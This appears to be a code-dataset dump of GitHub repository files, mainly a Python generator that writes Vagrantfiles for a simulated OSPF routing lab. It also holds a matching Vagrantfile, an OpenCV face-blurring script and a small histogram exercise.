Host[\"id\"]\n Name = Host[\"label\"]\n Os = Host[\"vm_image\"]\n Ram = Host[\"ram\"]\n N_Cpus = Host[\"n_cpus\"]\n Ip = Host[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Host[\"network_interfaces\"][0][\"netmask\"]\n Interface = Host[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Host[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n \n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n\n CustumScript = Host[\"custom_script\"]\n #there must be a more efficient way to calculate this, this one is too trivial\n for x in Network:\n Gateway = str(x)\n\n f.write(\"config.vm.define \\\"\" + Name + \"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\" + Name + \"\\\"\\n\")\n\n \n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: true\\n\") \n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + str(IpNet) + \" netmask \" + Netmask + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n for edge in edges:\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + Ram + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\ndef writeWebServer(f, Web, edges):\n\n Id = Web[\"id\"]\n Name = Web[\"label\"]\n Os = Web[\"vm_image\"]\n Ram = Web[\"ram\"]\n N_Cpus = Web[\"n_cpus\"]\n \n Ip = Web[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Web[\"network_interfaces\"][0][\"netmask\"]\n Interface = Web[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Web[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n CustumScript = Web[\"custom_script\"]\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n for x in Network:\n Gateway = str(x)\n\n f.write('config.vm.define \\\"' + Name + '\\\" do |' + Name + '|\\n')\n f.write(Name + '.vm.box = \\\"' + Os + '\\\" \\n')\n f.write(Name + '.vm.hostname = \\\"' + Name + '\\\"\\n')\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\") \n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + '.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\\n')\n f.write('echo \"Static Routig configuration Started for ' + Name + '\\\"\\n')\n f.write('sudo sysctl -w net.ipv4.ip_forward=1\\n')\n f.write(\"sudo route add -net \" + str(IpNet) + \" netmask \" + Netmask + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n\n f.write('echo \"Configuration END\"\\n')\n f.write('#echo ' + Name + ' is ready to Use\"\\n')\n f.write('SHELL\\n')\n f.write('web1.vm.provision \"docker\" do |doc|\\n')\n f.write('doc.pull_images \"nginx\"\\n')\n f.write('doc.pull_images \"php\"\\n')\n f.write('doc.run \"nginx\"\\n')\n f.write('doc.run \"php\"\\n')\n f.write('end\\n')\n f.write(Name + '.vm.provider \"virtualbox\" do |vb|\\n')\n f.write(\"vb.memory = \" + Ram + \"\\n\")\n f.write('end\\n')\n f.write('end\\n')\n\ndef writeDatabase(f, Db, edges):\n # Configure database server machine\n Id = Db[\"id\"]\n Name = Db[\"label\"]\n Os = Db[\"vm_image\"]\n Ram = Db[\"ram\"]\n N_Cpus = Db[\"n_cpus\"]\n\n Ip = Db[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Db[\"network_interfaces\"][0][\"netmask\"]\n Interface = Db[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Db[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n CustumScript = Db[\"custom_script\"]\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n for x in Network:\n Gateway = str(x)\n\n f.write('config.vm.define \\\"' + Name + '\\\" do |' + Name + '|\\n')\n f.write(Name + '.vm.box = \\\"' + Os + '\\\" \\n')\n f.write(Name + '.vm.hostname = \\\"' + Name + '\\\" \\n')\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: true\\n\") \n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + '.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\\n')\n f.write('echo \"Static Routig configuration Started for db-1\"\\n')\n f.write('sudo sysctl -w net.ipv4.ip_forward=1\\n')\n f.write(\"sudo route add -net \" + str(IpNet) + \" netmask \" + Netmask + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n\n f.write('echo \"Configuration END\"\\n')\n f.write('#echo \"Host--B is ready to Use\"\t\\n')\n f.write('SHELL\\n')\n f.write(Name + '.vm.provision \"docker\" do |doc|\\n')\n f.write('doc.pull_images \"mysql\"\\n')\n f.write('doc.run \"mysql\"\\n')\n f.write('end\\n')\n f.write(Name + '.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.memory = ' + str(Ram) +'\\n')\n f.write('vb.cpus = ' + str(N_Cpus) + '\\n')\n f.write('end\\n')\n f.write('end\\n')\n\n\n\n#this function write in the vagrant file a new Router\ndef writeRouter(f, Router, edges):\n\n # print(\"adding a router to the vagrant file\") \n\n #extrapolate each attribute from the touples\n Id = Router[\"id\"]\n Name = Router[\"label\"]\n Os = Router[\"vm_image\"]\n Ram = Router[\"ram\"]\n N_Cpus = Router[\"n_cpus\"]\n\n Ip1 = Router[\"network_interfaces\"][0][\"ip_address\"]\n Netmask1 = Router[\"network_interfaces\"][0][\"netmask\"]\n Interface1 = Router[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference1 = Router[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth1 = 0\n DownlinkBandwidth1 = 0\n for edge in edges:\n if EdgeReference1[0] == edge[\"from\"] and EdgeReference1[1] == edge[\"to\"]:\n UplinkBandwidth1 = edge[\"bandwidth_up\"]\n DownlinkBandwidth1 = edge[\"bandwidth_down\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n NetmaskAbbr1 = Ip1.split(\"/\")[1]\n\n Ip2 = Router[\"network_interfaces\"][1][\"ip_address\"]\n Netmask2 = Router[\"network_interfaces\"][1][\"netmask\"]\n Interface2 = Router[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReference2 = Router[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidth2 = 0\n DownlinkBandwidth2 = 0\n for edge in edges:\n if EdgeReference2[0] == edge[\"from\"] and EdgeReference2[1] == edge[\"to\"]:\n UplinkBandwidth2 = edge[\"bandwidth_up\"]\n DownlinkBandwidth2 = edge[\"bandwidth_down\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n NetmaskAbbr2 = Ip2.split(\"/\")[1]\n\n Ip3 = Router[\"network_interfaces\"][2][\"ip_address\"]\n Netmask3 = Router[\"network_interfaces\"][2][\"netmask\"]\n Interface3 = Router[\"network_interfaces\"][2][\"name_interface\"]\n EdgeReference3 = Router[\"network_interfaces\"][2][\"edge\"]\n UplinkBandwidth3 = 0\n DownlinkBandwidth3 = 0\n for edge in edges:\n if EdgeReference3[0] == edge[\"from\"] and EdgeReference3[1] == edge[\"to\"]:\n UplinkBandwidth3 = edge[\"bandwidth_up\"]\n DownlinkBandwidth3 = edge[\"bandwidth_down\"]\n IpNoSub3 = Ip3.split(\"/\")[0]\n NetmaskAbbr3 = Ip3.split(\"/\")[1]\n \n Network1 = ipcalc.Network(Ip1)\n IpNet1 = Network1.network()\n for x in Network1:\n Gateway1 = str(x)\n\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = Network2.network()\n for x in Network2:\n Gateway2 = str(x)\n\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = Network3.network()\n for x in Network3:\n Gateway3 = str(x) \n\n CustumScript = Router[\"custom_script\"]\n\n\n f.write(\"config.vm.define \\\"\"+ Name +\"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\"+ Name +\"\\\"\\n\")\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + IpNoSub1 + '\\\", netmask: \\\"' + Netmask1 + '\\\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: true\\n')\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + IpNoSub2 + '\\\", netmask: \\\"' + Netmask2 + '\\\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\\n')\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + IpNoSub3 + '\\\", netmask: \\\"' + Netmask3 + '\\\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: true\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\" Quagga \"+ Name +\" start installing\\\"\\n\")\n f.write(\"#sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo apt-get update\\n\")\n f.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\n f.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\n f.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\n f.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\n f.write(\"sudo /etc/init.d/quagga start\\n\")\n f.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\n f.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\n f.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\n f.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\n f.write(\"sudo /etc/init.d/quagga restart\\n\")\n f.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\n f.write(\"sudo vtysh -c '\\n\")\n f.write(\"configure terminal\\n\")\n f.write(\"router ospf\\n\")\n f.write(\"network \" + str(IpNet1) + \"/\" + NetmaskAbbr1 + \" area 0.0.0.0\\n\")\n f.write(\"interface \" + Interface1 + \"\\n\")\n f.write(\"ip address \" + IpNoSub1 + \"/\" + NetmaskAbbr1 + \"\\n\")\n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface2 + \"\\n\")\n f.write(\"ip address \" + IpNoSub2 + \"/\" + NetmaskAbbr2 + \"\\n\")\n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface3 + \"\\n\")\n f.write(\"ip address \" + IpNoSub3 + \"/\" + NetmaskAbbr3 + \"\\n\")\n f.write(\"do write\\n\")\n f.write(\"exit\\n\")\n f.write(\"exit\\n\")\n f.write(\"ip forwarding\\n\")\n f.write(\"exit'\\n\")\n\n if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:\n f.write('sudo ./wondershaper -a ' + Interface1)\n if DownlinkBandwidth1 > 0:\n f.write(' -d ' + str(DownlinkBandwidth1))\n if UplinkBandwidth1 > 0:\n f.write(' -u ' + str(UplinkBandwidth1))\n f.write('\\n')\n\n if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:\n f.write('sudo ./wondershaper -a ' + Interface2)\n if DownlinkBandwidth2 > 0:\n f.write(' -d ' + str(DownlinkBandwidth2))\n if UplinkBandwidth2 > 0:\n f.write(' -u ' + str(UplinkBandwidth2))\n f.write('\\n')\n \n if UplinkBandwidth3 > 0 or DownlinkBandwidth3 > 0:\n f.write('sudo ./wondershaper -a ' + Interface3)\n if DownlinkBandwidth3 > 0:\n f.write(' -d ' + str(DownlinkBandwidth3))\n if UplinkBandwidth3 > 0:\n f.write(' -u ' + str(UplinkBandwidth3))\n f.write('\\n')\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write('vb.cpus =' + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\"\"\"\n#the following is a fake graph that i used for testing\n#instead of typing everytime the input in the command line\nhost1 = (1,{\n \"Id\" : 1,\n \"Name\":\"host1\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.10.10/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nrout1 = (2,{\n \"Id\" : 2,\n \"Name\":\"router1\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.10.2/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"192.168.10.3/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth2\"\n },{\n \"Ip\": \"192.168.10.4/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth3\"\n }]\n})\n\nweb1 = (3,{\n \"Id\" : 3,\n \"Name\":\"web1\",\n \"Type\": \"Web\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.10.11/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\ndb1 = (4,{\n \"Id\" : 4,\n \"Name\":\"db1\",\n \"Type\": \"Db\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.10.12/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nMyNet = [host1,rout1,web1,db1]\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef remap(newList):\n print(\"-------------------\")\n\n for item in newList:\n print(\"Looking at device \" + str(item))\n print(\"the TYPE is \" + item[\"type\"])\n if item[\"type\"] == \"router\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n device[1][\"Network\"][1][\"Ip\"] = item[\"network_interfaces\"][1][\"ip_address\"]\n device[1][\"Network\"][1][\"Netmask\"] = item[\"network_interfaces\"][1][\"netmask\"]\n device[1][\"Network\"][1][\"Interface\"] = item[\"network_interfaces\"][1][\"name_interface\"]\n\n device[1][\"Network\"][2][\"Ip\"] = item[\"network_interfaces\"][2][\"ip_address\"]\n device[1][\"Network\"][2][\"Netmask\"] = item[\"network_interfaces\"][2][\"netmask\"]\n device[1][\"Network\"][2][\"Interface\"] = item[\"network_interfaces\"][2][\"name_interface\"] \n\n for item in newList:\n if item[\"type\"] == \"host\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n return MyNet\n\"\"\"\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n #read the data structure from input\n #Network = G.nodes.data():\n #file = codecs.open(\"NetworkGraphs/Template/OSPF_Routing_Template.html\", \"r\", \"utf-8\")\n #html = file.read()\n\n #if \"nodes = new vis.DataSet(\" in html:\n # listOfDevice = find_between(html, \"nodes = new vis.DataSet(\" , \")\")\n # print(listOfDevice)\n # listOfDevice = yaml.load(listOfDevice) \n\n #newNet = remap(listOfDevice)\n #N.B per Luca, Network è già la lista dei nodi che puoi esplorare\n #Network = MyNet #DA SOSTITUIRE CON \"NEW NET\" ALLA FINE\n\n BeginVagrantFile(VagrantFile)\n\n for node in nodes: \n if node[\"type\"] == \"router\":\n writeRouter(VagrantFile, node, edges)\n if node[\"type\"] == \"host\":\n writeHost(VagrantFile, node, edges)\n if node[\"type\"] == \"Web\":\n writeWebServer(VagrantFile, node, edges)\n if node[\"type\"] == \"Db\":\n writeDatabase(VagrantFile, node, edges)\n VagrantFile.write(\"end\\n\")\n VagrantFile.close()\n"
},
{
"alpha_fraction": 0.7089970111846924,
"alphanum_fraction": 0.7559190988540649,
"avg_line_length": 35.873016357421875,
"blob_id": "edf8c97bc40a575b87ca7975ab57b70090b79380",
"content_id": "fad86b940113d98a24d3167f4b51b9912e9d7ee0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 2323,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 63,
"path": "/NetworkGraphs/Presentation/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "# webserver and a host you can access the webserver from your browser with ip address 10.0.0.50 or from the host \n# -*- mode: ruby -*-\n# vi: set ft=ruby :\nVagrant.configure(\"2\") do |config|\n# Configure web server machine\nconfig.vm.define \"web2\" do |web2|\nweb2.vm.box = \"bento/ubuntu-16.04\"\nweb2.vm.hostname = \"web2\"\nweb2.vm.network \"private_network\", ip: \"10.0.0.51/24\" \nweb2.vm.provision \"file\", source: \"../Dashboard_Server/telegraf.conf\", destination: \"/tmp/telegraf.conf\"\nweb2.vm.provision \"shell\", inline: <<-SHELL \necho \"Starting Provision: web server\"\nsudo apt-get update\nsudo apt-get install -y nginx\ntouch /var/www/html/index.php\nsudo apt-get install -y php-fpm php-mysql\ncd /home/vagrant\ngit clone https://github.com/magnific0/wondershaper.git\ncd wondershaper\nsudo ./wondershaper -a eth1 -d 1000 -u 1000\nwget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\nsudo dpkg -i telegraf_1.17.3-1_amd64.deb\nsudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\nsudo systemctl restart telegraf\nsudo systemctl enable telegraf\nsudo apt install -y htop \necho \"Provision web server complete\"\nSHELL\nweb2.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nvb.cpus = 2\nend\nend\n# Configure database server machine\nconfig.vm.define \"db2\" do |db2|\ndb2.vm.box = \"bento/ubuntu-16.04\"\ndb2.vm.hostname = \"db2\"\ndb2.vm.network \"private_network\", ip: \"10.0.0.52/24\" \ndb2.vm.provision \"file\", source: \"../Dashboard_Server/telegraf.conf\", destination: \"/tmp/telegraf.conf\"\ndb2.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\nsudo apt update\nsudo DEBIAN_FRONTEND=noninteractive apt-get -q -y install mysql-server\necho \"WARNING: It is necessary to set the root password of mysql-server before using it!!!\"\necho \"Example password configuration: mysqladmin -u root password mysecretpasswordgoeshere\"\nsleep 10\ncd /home/vagrant\ngit clone https://github.com/magnific0/wondershaper.git\ncd wondershaper\nsudo ./wondershaper -a eth1 -d 1000 -u 1000\nwget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\nsudo dpkg -i telegraf_1.17.3-1_amd64.deb\nsudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\nsudo systemctl restart telegraf\nsudo systemctl enable telegraf\nsudo apt install -y htop \necho \"Provision database server complete\"\nSHELL\ndb2.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nvb.cpus = 2\nend\nend\nend\n"
}
] | 24 |
Nazlaamelia/Face-Detection-And-Blurring
|
https://github.com/Nazlaamelia/Face-Detection-And-Blurring
|
5e835d9722839b8e68614330c730aa4c4c5f9323
|
b4227f1f5509179ee4704cea44e7f430dd49dfb5
|
363f7a375d57c036ffa90d21b0d155929d620429
|
refs/heads/main
| 2023-02-15T13:58:31.556717 | 2021-01-14T09:49:33 | 2021-01-14T09:49:33 | 329,561,221 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.560669481754303,
"alphanum_fraction": 0.6066945791244507,
"avg_line_length": 24.33333396911621,
"blob_id": "fac274bca5b76dd7a0913a0bd27f15ee5ebeefe0",
"content_id": "e7c9b74ada3cc6d91c0d4c1d79dfb05041b676ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 18,
"path": "/BlurWajah.py",
"repo_name": "Nazlaamelia/Face-Detection-And-Blurring",
"src_encoding": "UTF-8",
"text": "import cv2\r\nimport numpy as np\r\n\r\nface_cascade = cv2.CascadeClassifier(\"face_detector.xml\")\r\n\r\nimg = cv2.imread(\"rame.jpeg\")\r\n\r\ndetections = face_cascade.detectMultiScale(img, scaleFactor=1.1, minNeighbors=6)\r\n\r\nfor face in detections :\r\n x,y,w,h = face \r\n \r\n img[y:y+h,x:x+w] = cv2.GaussianBlur(img[y:y+h,x:x+w],(15,15),cv2.BORDER_DEFAULT)\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\r\n\r\n cv2.imshow(\"Hasil Blur Wajah\", img)\r\n\r\ncv2.waitKey(0)\r\n\r\n\r\n"
}
] | 1 |
varsh2506/PythonAssignment
|
https://github.com/varsh2506/PythonAssignment
|
23c08e6afd552d9d7726654e981d7201a16a5d4b
|
7ae2964d51af6a489ec05917e85624a2459a47ca
|
dc5d226de816b83bb05232ba8dc7000bea339847
|
refs/heads/master
| 2021-01-20T16:38:27.235859 | 2017-05-16T09:50:05 | 2017-05-16T09:50:05 | 90,830,351 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8666666746139526,
"alphanum_fraction": 0.8666666746139526,
"avg_line_length": 21.5,
"blob_id": "5beefe3d1b4a78d9a6faebe8f10061c52e311a1d",
"content_id": "8c0f3bcafa1cb4c7ff52876c8baa3199798c3605",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 2,
"path": "/README.md",
"repo_name": "varsh2506/PythonAssignment",
"src_encoding": "UTF-8",
"text": "# PythonAssignment\nExperimenting with Python\n"
},
{
"alpha_fraction": 0.5768863558769226,
"alphanum_fraction": 0.6055396199226379,
"avg_line_length": 29.058822631835938,
"blob_id": "b4c5c16b4140b934292c57a9b8c33770d6cc4b54",
"content_id": "63f915bc2d98c7b973be6eeec9258cae0dfc3792",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1047,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 34,
"path": "/Assignment2.py",
"repo_name": "varsh2506/PythonAssignment",
"src_encoding": "UTF-8",
"text": "'''This code displays the histogram for a given data set according the user's choice of class size.\nFirst, the hist_data list is updated with each of its elements being a list of elements in a particular class interval.\nThe histogram is then displayed using the hist_data list.'''\n\ndata = [3, 4, 3, 4, 5, 6, 2, 1, 5, 4, 6, 7, 8, 9, 10, 1, 20, 6, 8, 9]\nhist_data = [] #Stores the values in each range as a list of lists\nbin_size = int(raw_input(\"Enter width of each interval: \"))\nl = min(data)\nu = bin_size+l-1\nct = 0 \ndata.sort()\n\nil = [] #Inner list which contains the values in a specific range\nwhile ct<len(data): \n if data[ct]>=l and data[ct]<=u:\n il.append(data[ct])\n ct+=1\n else:\n l=u+1\n u=l+bin_size-1\n hist_data.append(il)\n il = []\n if ct==len(data):\n hist_data.append(il)\n\nl = min(data)\nu = bin_size+l-1\n\n#Printing the histogram using the hist_data list\nfor j in hist_data:\n print str(l)+'-'+str(u),\n print '-'*len(j)\n l=u+1\n u=bin_size+l-1\n\n \n \n \n \n"
}
] | 2 |
myevan/python-tcod-tutorial
|
https://github.com/myevan/python-tcod-tutorial
|
82f14729056964cd99a3c98f1408cd5878d406a9
|
f2ea2b8f3737a4a9f47855fa3c300bac806fd19b
|
190800b574aeb921b817040ac112e0d897abbe52
|
refs/heads/master
| 2022-02-28T14:46:25.790297 | 2019-07-24T16:50:26 | 2019-07-24T16:50:26 | 198,012,462 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6195028424263,
"alphanum_fraction": 0.6195028424263,
"avg_line_length": 25.149999618530273,
"blob_id": "da874f210238617196dbf13ec9dc168115bbe0eb",
"content_id": "26369abeaf93a2c826f4620567f70445dd0b1209",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1046,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 40,
"path": "/evs.py",
